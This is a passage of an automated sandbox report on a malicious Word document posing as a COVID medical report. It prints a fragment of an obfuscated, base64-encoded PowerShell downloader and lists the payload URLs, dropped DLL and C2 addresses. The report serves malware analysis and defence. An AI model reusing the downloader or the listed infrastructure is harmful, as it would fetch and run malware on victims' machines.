nAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 7_2_1000B569
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10006D1F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 7_2_10006D1F
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 332936 Sample: GT-9333 Medical report COVI... Startdate: 21/12/2020 Architecture: WINDOWS Score: 100 46 Antivirus detection for URL or domain 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->50 52 9 other signatures 2->52 9 cmd.exe 2->9         started        12 WINWORD.EXE 436 30 2->12         started        process3 signatures4 56 Suspicious powershell command line found 9->56 58 Very long command line found 9->58 60 Encrypted powershell cmdline option found 9->60 62 PowerShell case anomaly found 9->62 14 powershell.exe 12 9 9->14         started        19 msg.exe 9->19         started        process5 dnsIp6 38 transfersuvan.com 186.64.117.145, 49170, 80 ZAMLTDACL Chile 14->38 40 arquivopop.com.br 191.6.208.18, 49169, 80 IPV6InternetLtdaBR Brazil 14->40 42 2 other IPs or domains 14->42 30 C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll, PE32 14->30 dropped 44 Powershell drops PE file 14->44 21 rundll32.exe 14->21         started        file7 signatures8 process9 process10 23 rundll32.exe 2 21->23         started        signatures11 54 Hides that the sample has been downloaded from the Internet (zone.identifier) 23->54 26 rundll32.exe 9 23->26         started        process12 dnsIp13 32 50.116.111.59, 49174, 8080 UNIFIEDLAYER-AS-1US United States 26->32 34 78.188.225.105, 80 TTNETTR Turkey 26->34 36 197.87.160.216, 80 OPTINETZA South Africa 26->36 64 System process connects to network (likely due to code injection or exploit) 26->64 signatures14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
35.208.182.43
unknown United States
19527 GOOGLE-2US true
78.188.225.105
unknown Turkey
9121 TTNETTR true
50.116.111.59
unknown United States
46606 UNIFIEDLAYER-AS-1US true
186.64.117.145
unknown Chile
52368 ZAMLTDACL true
197.87.160.216
unknown South Africa
10474 OPTINETZA true
191.6.208.18
unknown Brazil
28299 IPV6InternetLtdaBR true

Contacted Domains

Name IP Active
isatechnology.com 35.208.182.43 true
arquivopop.com.br 191.6.208.18 true
transfersuvan.com 186.64.117.145 true
www.isatechnology.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://arquivopop.com.br/index_htm_files/Kxh/ true
  • Avira URL Cloud: safe
unknown
http://transfersuvan.com/wp-admin/OVl/ true
  • Avira URL Cloud: safe
unknown
http://50.116.111.59:8080/zikye087/k6io5sui3jj27i90cer/zipbonjrmr/ true
  • Avira URL Cloud: safe
unknown